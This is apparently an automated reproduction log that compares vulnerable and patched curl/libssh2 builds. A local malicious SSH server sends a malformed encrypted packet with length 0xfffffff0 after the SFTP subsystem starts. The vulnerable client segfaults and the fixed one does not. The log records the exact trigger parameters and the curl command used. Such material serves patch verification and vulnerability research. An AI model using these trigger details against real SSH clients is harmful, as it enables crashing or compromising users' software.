/data/pruva/project-cache/74f8a750-7647-4916-b031-ad3c29d96638/product-release-m32-v2/curl-vuln/src/curl: ELF 32-bit LSB pie executable, Intel i386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=f8a0a85a999bc3713d56cc5cee0d3328b56a1b0d, for GNU/Linux 3.2.0, not stripped /data/pruva/project-cache/74f8a750-7647-4916-b031-ad3c29d96638/product-release-m32-v2/curl-fixed/src/curl: ELF 32-bit LSB pie executable, Intel i386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=4f47f90ddc3359b9031594909ac55a772409273e, for GNU/Linux 3.2.0, not stripped linux-gate.so.1 (0xf7f15000) libssl.so.3 => /usr/lib/i386-linux-gnu/libssl.so.3 (0xf7c86000) libcrypto.so.3 => /usr/lib/i386-linux-gnu/libcrypto.so.3 (0xf7764000) libz.so.1 => /usr/lib/i386-linux-gnu/libz.so.1 (0xf7748000) libssh2.so.1 => /data/pruva/project-cache/74f8a750-7647-4916-b031-ad3c29d96638/product-release-m32-v2/libssh2-vuln-prefix/lib/libssh2.so.1 (0xf76ef000) libc.so.6 => /usr/lib/i386-linux-gnu/libc.so.6 (0xf74a7000) libzstd.so.1 => /usr/lib/i386-linux-gnu/libzstd.so.1 (0xf73d6000) /lib/ld-linux.so.2 (0xf7f17000) linux-gate.so.1 (0xf7f21000) libssl.so.3 => /usr/lib/i386-linux-gnu/libssl.so.3 (0xf7c92000) libcrypto.so.3 => /usr/lib/i386-linux-gnu/libcrypto.so.3 (0xf7770000) libz.so.1 => /usr/lib/i386-linux-gnu/libz.so.1 (0xf7754000) libssh2.so.1 => /data/pruva/project-cache/74f8a750-7647-4916-b031-ad3c29d96638/product-release-m32-v2/libssh2-fixed-prefix/lib/libssh2.so.1 (0xf76fb000) libc.so.6 => /usr/lib/i386-linux-gnu/libc.so.6 (0xf74b3000) libzstd.so.1 => /usr/lib/i386-linux-gnu/libzstd.so.1 (0xf73e2000) /lib/ld-linux.so.2 (0xf7f23000) curl 8.21.0-DEV (Linux) libcurl/8.21.0-DEV OpenSSL/3.5.5 zlib/1.3.1 libssh2/1.11.2_DEV Release-Date: [unreleased] Protocols: dict file ftp ftps gopher gophers http https imap imaps ipfs ipns mqtt mqtts pop3 pop3s rtsp scp sftp smtp smtps telnet tftp ws wss Features: alt-svc AsynchDNS HSTS HTTPS-proxy IPv6 Largefile libz SSL threadsafe TLS-SRP UnixSockets curl 8.21.0-DEV (Linux) libcurl/8.21.0-DEV OpenSSL/3.5.5 zlib/1.3.1 libssh2/1.11.2_DEV Release-Date: [unreleased] Protocols: dict file ftp ftps gopher gophers http https imap imaps ipfs ipns mqtt mqtts pop3 pop3s rtsp scp sftp smtp smtps telnet tftp ws wss Features: alt-svc AsynchDNS HSTS HTTPS-proxy IPv6 Largefile libz SSL threadsafe TLS-SRP UnixSockets /data/pruva/runs/48728946-9579-48bf-9963-decbf8354536/bundle/repro/reproduction_steps.sh: line 274: 425 Segmentation fault (core dumped) LD_LIBRARY_PATH="$libdir${LD_LIBRARY_PATH:+:$LD_LIBRARY_PATH}" LD_DEBUG=libs timeout --preserve-status 20 "$curl_bin" -v --connect-timeout 5 --max-time 12 --user 'user:pass' --hostpubsha256 "$hostfp" "sftp://127.0.0.1:$port/probe.txt" > "$clilog" 2> "$ldlog" malicious SSH server listening on 127.0.0.1:41973 accepted TCP client peer=('127.0.0.1', 45842) begin_auth username='user' password_auth_supported password_auth_supported password_auth_supported validate_password username='user' password='pass' auth_completed session_requested accepted session channel made subsystem_requested subsystem='sftp' session_started; SFTP subsystem accepted; scheduling malformed encrypted packet injecting packet reason=after-sftp-subsystem seq=11 encryption=ChachaEncryption sent encrypted malformed packet seq=11 clear_packet_length=0xfffffff0 body_len=32 wire_len=52 data_received len=9 first_bytes='\x00\x00\x00\x05\x01\x00\x00\x00\x03' session connection_lost exc=ConnectionLost('Connection lost') server connection_lost exc=ConnectionLost('Connection lost') /data/pruva/runs/48728946-9579-48bf-9963-decbf8354536/bundle/repro/reproduction_steps.sh: line 274: 453 Segmentation fault (core dumped) LD_LIBRARY_PATH="$libdir${LD_LIBRARY_PATH:+:$LD_LIBRARY_PATH}" LD_DEBUG=libs timeout --preserve-status 20 "$curl_bin" -v --connect-timeout 5 --max-time 12 --user 'user:pass' --hostpubsha256 "$hostfp" "sftp://127.0.0.1:$port/probe.txt" > "$clilog" 2> "$ldlog" malicious SSH server listening on 127.0.0.1:58993 accepted TCP client peer=('127.0.0.1', 60332) begin_auth username='user' password_auth_supported password_auth_supported password_auth_supported validate_password username='user' password='pass' auth_completed session_requested accepted session channel made subsystem_requested subsystem='sftp' session_started; SFTP subsystem accepted; scheduling malformed encrypted packet injecting packet reason=after-sftp-subsystem seq=11 encryption=ChachaEncryption sent encrypted malformed packet seq=11 clear_packet_length=0xfffffff0 body_len=32 wire_len=52 data_received len=9 first_bytes='\x00\x00\x00\x05\x01\x00\x00\x00\x03' session connection_lost exc=ConnectionLost('Connection lost') server connection_lost exc=ConnectionLost('Connection lost') malicious SSH server listening on 127.0.0.1:32929 accepted TCP client peer=('127.0.0.1', 49658) begin_auth username='user' password_auth_supported password_auth_supported password_auth_supported validate_password username='user' password='pass' auth_completed session_requested accepted session channel made subsystem_requested subsystem='sftp' session_started; SFTP subsystem accepted; scheduling malformed encrypted packet injecting packet reason=after-sftp-subsystem seq=11 encryption=ChachaEncryption sent encrypted malformed packet seq=11 clear_packet_length=0xfffffff0 body_len=32 wire_len=52 data_received len=9 first_bytes='\x00\x00\x00\x05\x01\x00\x00\x00\x03' session connection_lost exc=None server connection_lost exc=None malicious SSH server listening on 127.0.0.1:59985 accepted TCP client peer=('127.0.0.1', 56644) begin_auth username='user' password_auth_supported password_auth_supported password_auth_supported validate_password username='user' password='pass' auth_completed session_requested accepted session channel made subsystem_requested subsystem='sftp' session_started; SFTP subsystem accepted; scheduling malformed encrypted packet injecting packet reason=after-sftp-subsystem seq=11 encryption=ChachaEncryption sent encrypted malformed packet seq=11 clear_packet_length=0xfffffff0 body_len=32 wire_len=52 data_received len=9 first_bytes='\x00\x00\x00\x05\x01\x00\x00\x00\x03' session connection_lost exc=None server connection_lost exc=None selected_packet_length=0xfffffff0 vulnerable_native_signals=2 fixed_native_signals=0 vulnerable_run1_rc=139 vulnerable_run2_rc=139 fixed_run1_rc=2 fixed_run2_rc=2